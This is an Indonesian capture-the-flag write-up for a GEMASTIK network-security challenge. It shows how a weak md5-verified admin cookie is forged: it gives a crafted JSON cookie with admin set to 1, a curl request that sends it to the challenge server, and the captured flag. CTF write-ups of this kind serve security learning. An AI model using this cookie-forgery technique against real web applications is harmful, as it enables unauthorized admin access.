Powered by GitBook

http://target.netsec.gemastik.ui.ac.id:60011/23a1ef41c84db9e0976be78f83010d91/

POC

Validasi admin yang di lakukan menggunakan cookie dengan verifikasi md5 mudah untuk di manipulasi sehingga semua user bisa menjadi admin dengan memanipulasi cookie dan verifikasinya.

Kita merubah cookie auth menjadi seperti berikut dan memasukannya ke cookie auth

{"username" : "pok", "admin" : 1, "verifier" : "ff489bf5eae811c13710596f3db3369f"}

curl 'http://target.netsec.gemastik.ui.ac.id:60011/23a1ef41c84db9e0976be78f83010d91/index.php' -H 'Cookie: PHPSESSID=1n8qkakpgvttnrg4q40jig9so2; auth=%7B%22username%22+%3A+%22pok%22%2C+%22admin%22+%3A+1%2C+%22verifier%22+%3A+%22ff489bf5eae811c13710596f3db3369f%22%7D' --compressed

Flag : GEMASTIK{cookie_challenge_and_off_course_this_is_unrealistic}

results matching ""

No results matching ""